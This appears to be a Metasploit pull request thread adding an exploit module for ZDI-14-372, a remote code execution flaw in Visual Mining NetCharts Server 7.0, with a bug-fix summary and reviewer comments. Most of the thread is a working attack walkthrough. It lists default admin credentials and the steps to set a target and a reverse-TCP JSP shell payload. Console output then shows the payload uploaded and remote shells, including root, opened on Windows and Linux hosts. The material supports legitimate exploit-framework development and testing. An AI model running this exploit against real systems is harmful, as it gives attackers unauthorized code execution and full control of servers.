Add module for ZDI-14-372 Visual Mining NetCharts Remote Code Execution

[jvazquez-r7]

This pull request includes:

• Exploit for ZDI-14-372 Visual Mining NetCharts Remote Code Execution (http://www.zerodayinitiative.com/advisories/ZDI-14-372/)
• Small fix for Rex::MIME::Message, because its method #to_s was adding a bad first new line when the message hadn't headers. Specs have been updated too.
• Fix for Msf::Payload::JSP to randomize some variables used in the JSP payloads. In this exploit the out variable was creating a conflict when JASPER was trying to compile the JSP. I've randomized some 'common' variable names.

Verification

• Ensure which travis is green
• Download Visual Mining Netcharts 7.0. It's available for download from: http://www.visualmining.com/download-ncd-ncs/
• At the time of writing there is no patch, verify which installers have not been updated, my shasum signatures:

51f406615a52b33b517c1de15e06c37d3dc1284f  NetChartsServer7.0.exe
5497b39d93b4fe8559d08c86276560b688b19798  NetChartsServer7.0.linux.bin

• Install Visual Mining NetCharts on a Windows or Linux system. I've used Windows 2008 and Ubuntu 10.04. But it should work in any Visual Mining NetCharts supported OS.
• While installing feel free to do a "Complete installation" or just a "Production Server" installation. The vulnerabilities exist in both deployments.
• Verify which the service is running after installation, access http://localhost:8001/Admin
• Access the web administration console, default credentials: Admin / Admin
• Access to Security / Manage Users
• You need to do some operation related to users: Change the Admin's password or create a new user. It is important, otherwise the authentication bypass won't work.
• Open msfconsole and use the module

msf > use exploit/multi/http/visual_mining_netcharts_upload

• Set the remote host target (RHOST)

msf exploit(visual_mining_netcharts_upload) > set RHOST 172.16.158.134
RHOST => 172.16.158.134

• Run the check command, ensure it detects the service

msf exploit(visual_mining_netcharts_upload) > check
[*] 172.16.158.134:8001 - The target service is running, but could not be validated.

• Set the payload to one of the JSP payloads (reverse_tcp or bind_tcp)

msf exploit(visual_mining_netcharts_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(visual_mining_netcharts_upload) > set LHOST 172.16.158.1
LHOST => 172.16.158.1

• Exploit, hopefully enjoy a session!
• windows

msf exploit(visual_mining_netcharts_upload) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:8001 - Uploading JSP payload Gfs0XXWCWBN.jsp...
[+] 172.16.158.134:8001 - JSP payload uploaded successfully
[*] 172.16.158.134:8001 - Executing payload...
[+] Deleted ./webapps/Admin/archive/ArchiveCache/Gfs0XXWCWBN.jsp

Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>echo 4232034632;echo mreyStVzgdccAVmbMQucqJmxbgPXQjnb
4232034632;echo mreyStVzgdccAVmbMQucqJmxbgPXQjnb

C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>
C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>rm -f "./webapps/Admin/archive/ArchiveCache/Gfs0XXWCWBN.jsp" >/dev/null ; echo ' & attrib.exe -r ".\webapps\Admin\archive\ArchiveCache\Gfs0XXWCWBN.jsp" & del.exe /f /q ".\webapps\Admin\archive\ArchiveCache\Gfs0XXWCWBN.jsp" & echo " ' >/dev/null;echo BAuuirxaniPBsuAXbQBPhmqSDKYEVapG
" ' >/dev/null;echo BAuuirxaniPBsuAXbQBPhmqSDKYEVapG

C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>
C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>

• linux

msf exploit(visual_mining_netcharts_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:8001 - Uploading JSP payload 9JkF7nKxOXK3.jsp...
[+] 172.16.158.133:8001 - JSP payload uploaded successfully
[*] 172.16.158.133:8001 - Executing payload...
[+] Deleted ./webapps/Admin/archive/ArchiveCache/9JkF7nKxOXK3.jsp

3314479140
cYfmhmfzJYidueBrQjHsNUGVecEdUzuW
OcCwWIcoJpzqEGPmpNeuqswglQpjvZuY
id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 2? [y/N]  y

[kernelsmith]

Juan, I don't think it matters since we're uploading jsp, but did you test on 32bit or 64?

[jvazquez-r7]

@kernelsmith, good question, tried on 32 bits system

[kernelsmith]

Win Server 2008 x64:

msf exploit(visual_mining_netcharts_upload) > so

Module options (exploit/multi/http/visual_mining_netcharts_upload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password to authenticate with
   Proxies                    no        Use a proxy chain
   RHOST     192.168.66.252   yes       The target address
   RPORT     8001             yes       The target port
   USERNAME                   no        The username to authenticate with
   VHOST                      no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.66.1     yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Visual Mining NetCharts Server 7.0


msf exploit(visual_mining_netcharts_upload) > exploit

[*] Started reverse handler on 192.168.66.1:4444
[*] 192.168.66.252:8001 - Uploading JSP payload mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp...
[+] 192.168.66.252:8001 - JSP payload uploaded successfully
[*] 192.168.66.252:8001 - Executing payload...
[*] Command shell session 1 opened (192.168.66.1:4444 -> 192.168.66.252:49174) at 2014-11-06 22:26:38 -0600
[+] Deleted ./webapps/Admin/archive/ArchiveCache/mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>echo 2540159369;echo KediuawYppdkgoGKpeZSTfmskctxpuBS
2540159369;echo KediuawYppdkgoGKpeZSTfmskctxpuBS

C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>
C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>rm -f "./webapps/Admin/archive/ArchiveCache/mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp" >/dev/null ; echo ' & attrib.exe -r ".\webapps\Admin\archive\ArchiveCache\mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp" & del.exe /f /q ".\webapps\Admin\archive\ArchiveCache\mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp" & echo " ' >/dev/null;echo OexvIaSdCHkctEzFkTylSUvngQYZXTfg
" ' >/dev/null;echo OexvIaSdCHkctEzFkTylSUvngQYZXTfg

C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>
C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>

[jvazquez-r7]

ooom, thanks @kernelsmith ! :)